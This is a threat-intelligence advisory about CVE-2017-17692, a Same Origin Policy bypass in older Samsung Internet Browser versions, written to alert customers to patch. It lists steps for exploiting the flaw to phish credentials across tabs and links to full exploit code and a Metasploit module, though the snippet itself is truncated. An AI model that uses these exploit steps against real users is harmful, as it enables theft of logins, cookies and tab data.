TACTICAL CYBER INTELLIGENCE REPORT
Actor Type: II
Serial: TR-18-003-002
Countries: IN, CN
Report Date: 20180101
Samsung Browser “Same Origin Policy” bypass vulnerability
On 27 December 2017, a critical vulnerability was reported in Samsung Internet Browser, the browser app that comes pre-installed on Samsung Android devices. The vulnerability could allow an attacker to steal data from browser tabs if the user visits an attacker-controlled site.
Identified originally as CVE-2017-17692, the new vulnerability, named the “Same Origin Policy (SOP) bypass issue,” resides in the Samsung Internet Browser versions 5.4.02.3 and earlier.[1] Samsung Internet Browser users should verify their version to be greater than the 5.4.02.3 version. In case it is not, users are recommended to update the application at once.
Analysis:
The Samsung Internet Browser comes pre-installed on hundreds of millions of devices. As a result of this vulnerability, these devices are vulnerable to attacks.
The Same Origin Policy is an important concept in application security, in which a browser allows scripts contained in a first web page, to then access data in the second web page. This execution is only permitted to occur if they have the same origin[2]. This security feature is designed to make it possible for web pages, within the same website, to interact with each other to prevent outside sites from interfering and accessing the website.
The vulnerability Same Origin Policy (SOP) bypass is identified in CVE-2017-17692 and is present in the Samsung Internet Browser 5.4.02.3 and earlier versions[3]. The application has more than 100 million downloads on Play Store and supports Android version 5.0 (Lollipop) and above. This means all supported Android versions running the application are vulnerable. Details about the application can be found at https://play.google.com/store/apps/details?id=com.sec.android.app.sbrowser.
An attack can be performed by creating a simple webpage and opening it in the affected browser version. Below are the steps to exploit the vulnerability:
- Create a simple page, e.g. spoof.html containing the following code snippet:
<script> |
- Click on the “go” button.
- The page will re direct to: https://google.com/csi
- This will produce a fake popup, prompting for an Email and Password
- Once submitted, the email and password are shared back to the parent tab, thus bypassing the “Same Origin Policy”
The complete exploit code is available at: https://datarift.blogspot.in/p/samsung-interent-browser-sop-bypass-cve.html.
A meta-split module has also been created and can be found in the Metasploit framework, also at: https://www.exploit-db.com/exploits/43376/ and https://fr.0day.today/exploit/28434 An attack video can be viewed at: https://www.youtube.com/watch?v=lpkbogxJXnw
Impact: An attacker can not only insert custom Javascript code into any domain name, but can also redirect a victim to malicious webpages, steal session cookies and data from different tabs which are opened in the browser. This will allow unauthorized access to victim’s confidential information. An attacker can also read and write webmail on behalf of the victim.
Mitigation and Preventive Measures: The vulnerability has already been reported to Samsung. Samsung has replied, “the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via an Apps store update in October."
It is therefore advised to our Red Sky Alliance customers to update their Samsung Internet Browsers to latest version. To check the browser version, go to Settings -> About Samsung
Internet: Your browser version should be greater than 5.4.02.3. In case it is not, users are recommended to update the application at once.
Contact the Wapack Labs for more information: 603-606-1246, or feedback@wapacklabs.com.
[1] https://thehackernews.com/2017/12/same-origin-policy-bypass.html
[2] https://en.wikipedia.org/wiki/Same-origin_policy
[3] https://datarift.blogspot.in/p/samsung-interent-browser-sop-bypass-cve.html
Comments